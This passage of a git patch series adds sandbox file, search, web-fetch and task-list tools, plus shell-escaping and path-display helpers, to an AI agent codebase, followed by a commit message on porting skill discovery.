+- Supports patterns like "**/*.ts", "src/**/*.js", "*.json"
+- Returns FILES (not directories) sorted by modification time (newest first)
+- Skips hidden files (names starting with ".") and node_modules
+- If path is omitted, the current working directory is used as the base
+- Use workspace-relative paths when setting path
+- Results are limited by the limit parameter (default: 100)
+
+IMPORTANT:
+- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support
+- Use this to narrow down candidate files before calling readFileTool or grepTool`,
+  inputSchema: globInputSchema,
+  execute: async (
+    { pattern, path: basePath, limit = DEFAULT_LIMIT },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "glob");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      // `limit` is spliced into `head -n`: a fractional value makes head fail (silently yielding
+      // zero files) and a negative one means "all but the last N" on GNU head, so normalize it.
+      const maxResults = Number.isFinite(limit) ? Math.max(0, Math.trunc(limit)) : DEFAULT_LIMIT;
+
+      let searchDir = workingDirectory;
+      if (basePath) {
+        searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath);
+      }
+
+      // Extract file-name pattern (last segment) + literal directory prefix
+      // (segments before any wildcards) so we can constrain `find -maxdepth`.
+      const patternParts = pattern.split("/").filter(Boolean);
+      const namePattern = patternParts[patternParts.length - 1] ?? "*";
+      const literalPrefix: string[] = [];
+      for (let i = 0; i < patternParts.length - 1; i++) {
+        const part = patternParts[i]!;
+        if (part.includes("*") || part.includes("?") || part.includes("[")) break;
+        literalPrefix.push(part);
+      }
+      if (literalPrefix.length > 0) {
+        searchDir = path.join(searchDir, ...literalPrefix);
+      }
+
+      const remainingDirSegments = patternParts.slice(
+        literalPrefix.length,
+        patternParts.length - 1,
+      );
+      const hasRecursiveWildcard =
+        remainingDirSegments.some(s => s === "**") || namePattern === "**";
+
+      // Without `**` the depth is fixed: one level per remaining directory segment plus the file.
+      const maxDepth = hasRecursiveWildcard ? undefined : remainingDirSegments.length + 1;
+
+      const findArgs: string[] = ["find", shellEscape(searchDir)];
+      if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth));
+      findArgs.push(
+        "-not",
+        "-path",
+        "'*/.*'",
+        "-not",
+        "-path",
+        "'*/node_modules/*'",
+        "-type",
+        "f",
+        "-name",
+        shellEscape(namePattern),
+      );
+
+      // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility.
+      const findBase = findArgs.join(" ");
+      const command = [
+        `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`,
+        `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`,
+        `| sort -t$'\\t' -k1 -rn | head -n ${maxResults}`,
+      ].join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // find may exit 1 on permission errors but still produce valid output.
+      if (!result.success && result.exitCode !== 1) {
+        return {
+          success: false,
+          error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`,
+        };
+      }
+
+      const files: FileInfo[] = [];
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        const firstTab = line.indexOf("\t");
+        if (firstTab === -1) continue;
+        const secondTab = line.indexOf("\t", firstTab + 1);
+        if (secondTab === -1) continue;
+        const mtimeSeconds = parseFloat(line.slice(0, firstTab));
+        const size = parseInt(line.slice(firstTab + 1, secondTab), 10);
+        const filePath = line.slice(secondTab + 1);
+        if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue;
+        files.push({
+          path: toDisplayPath(filePath, workingDirectory),
+          size,
+          modifiedAt: mtimeSeconds * 1000,
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        baseDir: toDisplayPath(searchDir, workingDirectory),
+        count: files.length,
+        files: files.map(f => ({
+          path: f.path,
+          size: f.size,
+          modifiedAt: new Date(f.modifiedAt).toISOString(),
+        })),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Glob failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts
new file mode 100644
index 000000000..f172f61af
--- /dev/null
+++ b/lib/agent/tools/grepTool.ts
@@ -0,0 +1,143 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface GrepMatch {
+  file: string; // display path produced by toDisplayPath
+  line: number; // line number parsed from the grep -n output
+  content: string; // matched line, sliced to MAX_LINE_LENGTH characters
+}
+
+const grepInputSchema = z.object({ // input contract for the `grep` tool
+  pattern: z.string().describe("Regex pattern to search for"),
+  path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"),
+  glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"),
+  caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"),
+});
+
+const GREP_TIMEOUT_MS = 30_000; // third argument to sandbox.exec for the grep command
+const MAX_TOTAL_MATCHES = 100; // the parse loop stops once this many matches are collected
+const MAX_PER_FILE_MATCHES = 10; // passed to grep -m and re-checked per file while parsing
+const MAX_LINE_LENGTH = 200; // match content is sliced to this many characters
+
+/**
+ * `grep` — search sandbox files for a POSIX-ERE pattern via `grep -rnH` and return parsed
+ * `file:line:content` matches. Caps: 100 matches total, 10 per file, 200 chars per line.
+ * Exit code 1 (no matches) is a success with an empty list; other failures give `success: false`.
+ */
+export const grepTool = tool({
+  description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE).
+
+WHEN TO USE:
+- Finding where a function, variable, or string literal is used
+- Locating configuration keys, routes, or error messages across files
+- Narrowing down which files to read or edit
+
+WHEN NOT TO USE:
+- Simple filename-only searches (use globTool instead)
+- Directory listings, builds, or other shell tasks (use bashTool instead)
+
+USAGE:
+- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+")
+- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]]
+- Search a specific file OR an entire directory via the path parameter
+- Use workspace-relative paths for path (e.g., "src")
+- Optionally filter files with glob (e.g., "*.ts", "*.test.js")
+- Matches are SINGLE-LINE: patterns do not span across newline characters
+- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters
+
+IMPORTANT:
+- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool
+- Use caseSensitive: false for case-insensitive searches
+- Hidden files and node_modules are skipped when searching directories`,
+  inputSchema: grepInputSchema,
+  execute: async (
+    { pattern, path: searchPath, glob, caseSensitive = true },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "grep");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(searchPath)
+        ? searchPath
+        : path.resolve(workingDirectory, searchPath);
+
+      // -H: grep omits the `file:` prefix when the target is a single file, which the parser below
+      // requires. `-e` keeps a pattern starting with "-" from being read as an option.
+      const args: string[] = ["grep", "-rnH", "-E", "-m", String(MAX_PER_FILE_MATCHES)];
+      if (!caseSensitive) args.push("-i");
+      args.push(
+        `--exclude-dir=${shellEscape(".*")}`,
+        `--exclude-dir=${shellEscape("node_modules")}`,
+      );
+      if (glob) args.push(`--include=${shellEscape(glob)}`);
+      args.push(
+        "-e",
+        shellEscape(pattern),
+        "--",
+        shellEscape(absolutePath),
+      );
+
+      const result = await sandbox.exec(args.join(" "), workingDirectory, GREP_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // grep exits with 1 when no matches found — that's not an error.
+      if (!result.success && result.exitCode !== 1) {
+        const errorOutput = (result.stderr || result.stdout).slice(0, 500);
+        return {
+          success: false,
+          error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`,
+        };
+      }
+
+      const matches: GrepMatch[] = [];
+      const filesSet = new Set<string>();
+      const fileMatchCounts = new Map<string, number>();
+
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        if (matches.length >= MAX_TOTAL_MATCHES) break;
+
+        // grep -rn output: file:line:content. Find the `:digits:` separator.
+        const match = line.match(/:(\d+):/);
+        if (!match || match.index === undefined) continue;
+        const file = line.slice(0, match.index);
+        const rest = line.slice(match.index + 1);
+        const colonIndex = rest.indexOf(":");
+        if (colonIndex === -1) continue;
+
+        const lineNum = parseInt(rest.slice(0, colonIndex), 10);
+        const content = rest.slice(colonIndex + 1);
+        if (isNaN(lineNum)) continue;
+
+        const displayFile = toDisplayPath(file, workingDirectory);
+        filesSet.add(displayFile);
+        const currentFileCount = fileMatchCounts.get(displayFile) ?? 0;
+        if (currentFileCount >= MAX_PER_FILE_MATCHES) continue;
+
+        fileMatchCounts.set(displayFile, currentFileCount + 1);
+        matches.push({
+          file: displayFile,
+          line: lineNum,
+          content: content.slice(0, MAX_LINE_LENGTH),
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        matchCount: matches.length,
+        filesWithMatches: filesSet.size,
+        matches,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Grep failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts
new file mode 100644
index 000000000..f5a486a64
--- /dev/null
+++ b/lib/agent/tools/readFileTool.ts
@@ -0,0 +1,70 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const readInputSchema = z.object({ // input contract for the `read` tool
+  filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"),
+  offset: z.number().optional().describe("Line number to start reading from (1-indexed)"), // execute() defaults this to 1
+  limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"),
+});
+
+/**
+ * `read` — read a file from the sandbox and return the requested window as numbered
+ * `N: <content>` lines, plus the total line count and the 1-based start/end of the window.
+ * `offset` and `limit` are floored; `limit` below 0 reads nothing. Directories are rejected.
+ */
+export const readFileTool = tool({
+  description: `Read a file from the filesystem.
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/index.ts")
+- Paths are resolved from the workspace root
+- By default reads up to 2000 lines starting from line 1
+- Use offset and limit for long files (both are line-based, 1-indexed)
+- Results include line numbers starting at 1 in "N: content" format
+
+IMPORTANT:
+- Always read a file at least once before editing it with the edit/write tools
+- This tool can only read files, not directories — attempting to read a directory returns an error
+- You can call multiple reads in parallel to speculatively load several files`,
+  inputSchema: readInputSchema,
+  execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "read");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const stats = await sandbox.stat(absolutePath);
+      if (stats.isDirectory()) {
+        return {
+          success: false,
+          error: "Cannot read a directory. Use glob or ls command instead.",
+        };
+      }
+
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+      const lines = content.split("\n");
+      // Floor both numbers and clamp limit at 0: a negative limit made slice() drop trailing lines.
+      const startLine = Math.max(1, Math.floor(offset)) - 1;
+      const endLine = Math.min(lines.length, startLine + Math.max(0, Math.floor(limit)));
+      const selectedLines = lines.slice(startLine, endLine);
+      const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        totalLines: lines.length,
+        startLine: startLine + 1,
+        endLine,
+        content: numberedLines.join("\n"),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts
new file mode 100644
index 000000000..8ba4a71a3
--- /dev/null
+++ b/lib/agent/tools/shellEscape.ts
@@ -0,0 +1,14 @@
+/**
+ * Quote a string so a POSIX shell reads it as one literal word.
+ *
+ * The value is wrapped in single quotes, where the shell expands nothing
+ * (`$`, `` ` ``, `&`, `*` stay literal). An embedded single quote is written
+ * as `'\''`: close the quoted run, emit an escaped quote, reopen the run.
+ * The result is safe to splice into a `bash -c` or `sh -c` command line.
+ *
+ * @param s - The string to escape.
+ * @returns `s` wrapped in single quotes with embedded quotes escaped.
+ */
+export function shellEscape(s: string): string {
+  return `'${s.split("'").join("'\\''")}'`;
+}
diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts
new file mode 100644
index 000000000..827c391af
--- /dev/null
+++ b/lib/agent/tools/toDisplayPath.ts
@@ -0,0 +1,34 @@
+import * as path from "path";
+
+function isPathWithinDirectory(filePath: string, directory: string): boolean {
+  // Compare via path.relative: a `dir + sep` prefix test breaks when dir is the root ("/" → "//").
+  const rel = path.relative(path.resolve(directory), path.resolve(filePath));
+  return rel !== ".." && !rel.startsWith(`..${path.sep}`) && !path.isAbsolute(rel);
+}
+
+/**
+ * Render a path the way tool output shows it to the model.
+ *
+ * A path located inside the working directory is shortened to its relative
+ * form (e.g. `src/index.ts`), and the working directory itself becomes `.`.
+ * A path outside it is returned in absolute form (e.g. `/etc/hosts`).
+ * Backslashes are converted to `/` in either case.
+ *
+ * @param filePath - Absolute path, or a path relative to `workingDirectory`.
+ * @param workingDirectory - The sandbox's working directory; expected to be absolute.
+ * @returns The relative or absolute display path described above.
+ */
+export function toDisplayPath(filePath: string, workingDirectory: string): string {
+  const toForwardSlashes = (p: string): string => p.split("\\").join("/");
+  const resolved = path.isAbsolute(filePath)
+    ? path.resolve(filePath)
+    : path.resolve(workingDirectory, filePath);
+
+  // Outside the workspace: keep the full path so the location stays unambiguous.
+  if (!isPathWithinDirectory(resolved, workingDirectory)) {
+    return toForwardSlashes(resolved);
+  }
+
+  const relative = path.relative(workingDirectory, resolved);
+  return relative === "" ? "." : toForwardSlashes(relative);
+}
diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts
new file mode 100644
index 000000000..d91e9147a
--- /dev/null
+++ b/lib/agent/tools/todoWriteTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+
+export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]);
+export type TodoStatus = z.infer<typeof todoStatusSchema>; // one of the three literals above
+
+export const todoItemSchema = z.object({ // shape of a single entry in the `todos` array
+  id: z.string().describe("Unique identifier for the todo item"),
+  content: z.string().describe("The task description"),
+  status: todoStatusSchema.describe(
+    "Current status. Only ONE task should be in_progress at a time.",
+  ),
+});
+export type TodoItem = z.infer<typeof todoItemSchema>; // { id, content, status }
+
+/**
+ * `todo_write` — planning tool that carries the agent's task list.
+ *
+ * `execute` keeps no state: it returns the submitted list unchanged together
+ * with a summary message, so each call must contain the complete, updated
+ * list. The returned list is intended for the chat UI to display as the
+ * current plan.
+ *
+ * Slot into `buildAgentTools` as `todo_write: todoWriteTool`.
+ */
+export const todoWriteTool = tool({
+  description: `Create and manage a structured task list for the current session.
+
+WHEN TO USE:
+- Complex multi-step tasks requiring 3 or more distinct steps
+- When the user provides multiple requirements or a checklist
+- After receiving new instructions - immediately capture them as todos
+- When starting work on a task - mark that todo as in_progress BEFORE beginning
+- After completing a task - mark it as completed immediately
+
+WHEN NOT TO USE:
+- A single, straightforward task that can be done in one step
+- Trivial tasks requiring fewer than 3 minor steps
+- Purely conversational or informational queries
+
+TASK STATES:
+- "pending": Task not yet started
+- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time)
+- "completed": Task finished successfully
+
+USAGE:
+- This tool REPLACES the entire todo list - always send the full, updated list of todos
+- Use it frequently to keep the task list in sync with your actual progress
+- Update statuses as you start and finish work, rather than batching updates later
+
+IMPORTANT:
+- Only one todo should be in_progress at a time; avoid parallel in_progress tasks
+- Mark todos as completed as soon as they are done - do not wait to batch completions
+- Use clear, concise todo content so the list remains readable to the user`,
+  inputSchema: z.object({
+    todos: z
+      .array(todoItemSchema)
+      .describe("The complete list of todo items. This replaces existing todos."),
+  }),
+  execute: async ({ todos }) => {
+    // No persistence here: the validated list is handed straight back with a count summary.
+    const message = `Updated task list with ${todos.length} items`;
+    return { success: true, message, todos };
+  },
+});
diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts
new file mode 100644
index 000000000..b395457f9
--- /dev/null
+++ b/lib/agent/tools/webFetchTool.ts
@@ -0,0 +1,124 @@
+import { tool } from "ai";
+import { z } from "zod";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+const FETCH_TIMEOUT_MS = 30_000; // feeds both curl --max-time (as seconds) and the sandbox.exec timeout
+export const MAX_BODY_LENGTH = 10_000; // byte cap applied via `head -c`; also quoted in the tool description
+
+const fetchInputSchema = z.object({ // input contract for the `web_fetch` tool
+  url: z.string().url().describe("The URL to fetch"),
+  method: z
+    .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"])
+    .optional()
+    .describe("HTTP method. Default: GET"),
+  headers: z
+    .record(z.string(), z.string())
+    .optional()
+    .describe("Optional HTTP headers as key-value pairs"),
+  body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"), // skipped for GET and HEAD
+});
+
+const fetchOutputSchema = z.union([ // success shape first, failure shape second
+  z.object({
+    success: z.literal(true),
+    status: z.number().int().nullable(), // null when no numeric status could be parsed from the output
+    body: z.string(),
+    truncated: z.boolean(), // true when curl exited with code 23
+  }),
+  z.object({ success: z.literal(false), error: z.string() }),
+]);
+
+/**
+ * `web_fetch` — make an HTTP request from inside the sandbox via curl, so traffic uses the
+ * sandbox's network egress and env instead of the worker's. The response body is cut to
+ * MAX_BODY_LENGTH bytes with `head -c`. HEAD requests go through `curl --head`, so their `body`
+ * holds the response headers. The request body is sent with `--data-raw` (never read from a
+ * file). Returns `{ success, status, body, truncated }` or `{ success: false, error }`.
+ */
+export const webFetchTool = tool({
+  description: `Fetch a URL from the web.
+
+USAGE:
+- Make HTTP requests to external URLs
+- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods
+- Returns the response status and body text
+- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`,
+  inputSchema: fetchInputSchema,
+  outputSchema: fetchOutputSchema,
+  execute: async (
+    { url, method = "GET", headers, body },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "web_fetch");
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+
+    const args: string[] = [
+      "curl",
+      "-sS",
+      // `-X HEAD` only renames the verb (curl then waits for a body); `--head` issues a real HEAD.
+      ...(method === "HEAD" ? ["--head"] : ["-X", method]),
+      "--max-time",
+      String(Math.ceil(FETCH_TIMEOUT_MS / 1000)),
+      "-o",
+      `>(head -c ${MAX_BODY_LENGTH} >&3)`,
+      "-w",
+      shellEscape("%{http_code}"),
+    ];
+
+    if (headers) {
+      for (const [key, value] of Object.entries(headers)) {
+        args.push("-H", shellEscape(`${key}: ${value}`));
+      }
+    }
+    if (method !== "GET" && method !== "HEAD" && body) {
+      // --data-raw sends the text as-is; plain -d would treat a leading "@" as a file to upload.
+      args.push("--data-raw", shellEscape(body));
+    }
+    args.push(shellEscape(url));
+
+    // Use fd 3 to split curl's response body (truncated by `head -c`) from
+    // the status code written via `-w`. The body goes to stdout via fd 3
+    // → fd 1, then we append the status code on its own newline.
+    const command = [
+      "exec 3>&1",
+      `status=$(${args.join(" ")})`,
+      "curlExit=$?",
+      "exec 3>&-",
+      "printf '\\n%s' \"$status\"",
+      "exit $curlExit",
+    ].join("\n");
+
+    try {
+      const result = await sandbox.exec(command, sandbox.workingDirectory, FETCH_TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses).
+      if (result.exitCode !== 0 && result.exitCode !== 23) {
+        return {
+          success: false,
+          error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`,
+        };
+      }
+
+      const output = result.stdout ?? "";
+      const lastNewline = output.lastIndexOf("\n");
+      const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : "";
+      const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output;
+      const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null;
+
+      return {
+        success: true,
+        status,
+        body: responseBody,
+        truncated: result.exitCode === 23,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Fetch failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts
new file mode 100644
index 000000000..c8e59e3c3
--- /dev/null
+++ b/lib/agent/tools/writeFileTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const writeInputSchema = z.object({
+  filePath: z
+    .string()
+    .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"),
+  content: z.string().describe("Content to write to the file"),
+});
+
+/**
+ * `write` — create or completely overwrite a file in the sandbox. Parent
+ * directories are created as needed. For small targeted edits prefer
+ * `editFileTool`.
+ */
+export const writeFileTool = tool({
+  description: `Write content to a file on the filesystem.
+
+WHEN TO USE:
+- Creating a new file that does not yet exist
+- Completely replacing the contents of an existing file after you've read it
+
+WHEN NOT TO USE:
+- Small or localized changes to an existing file (prefer editFileTool)
+- Reading files (use readFileTool instead)
+- Searching (use grepTool or globTool instead)
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/user.test.ts")
+- This will OVERWRITE existing files entirely
+- Parent directories are created automatically if they do not exist
+
+IMPORTANT:
+- ALWAYS read an existing file with readFileTool before overwriting it
+- Prefer editing existing files over creating new ones unless a new file is explicitly needed
+- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them
+- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`,
+  inputSchema: writeInputSchema,
+  execute: async ({ filePath, content }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "write");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const dir = path.dirname(absolutePath);
+      await sandbox.mkdir(dir, { recursive: true });
+      await sandbox.writeFile(absolutePath, content, "utf-8");
+      const stats = await sandbox.stat(absolutePath);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        bytesWritten: stats.size,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to write file: ${message}` };
+    }
+  },
+});

From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 14:47:56 -0500
Subject: [PATCH 5/5] feat(chat-workflow): port skill discovery + skillTool (PR
 6, slim) (#587)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |   2 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  47 ++++-
 lib/agent/buildAgentTools.ts                  |  24 +--
 lib/agent/tools/AgentContext.ts               |  11 ++
 lib/agent/tools/__tests__/skillTool.test.ts   | 169 ++++++++++++++++++
 lib/agent/tools/skillTool.ts                  |  87 +++++++++
 .../handleChatWorkflowStream.test.ts          |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  21 +++
 lib/skills/__tests__/discoverSkills.test.ts   | 158 ++++++++++++++++
 lib/skills/__tests__/extractSkillBody.test.ts |  22 +++
 lib/skills/__tests__/findSkillFile.test.ts    |  34 ++++
 .../getGlobalSkillsDirectory.test.ts          |  15 ++
 .../getSandboxSkillDirectories.test.ts        |  23 +++
 lib/skills/__tests__/getSkills.test.ts        |  31 ++++
 .../__tests__/injectSkillDirectory.test.ts    |  14 ++
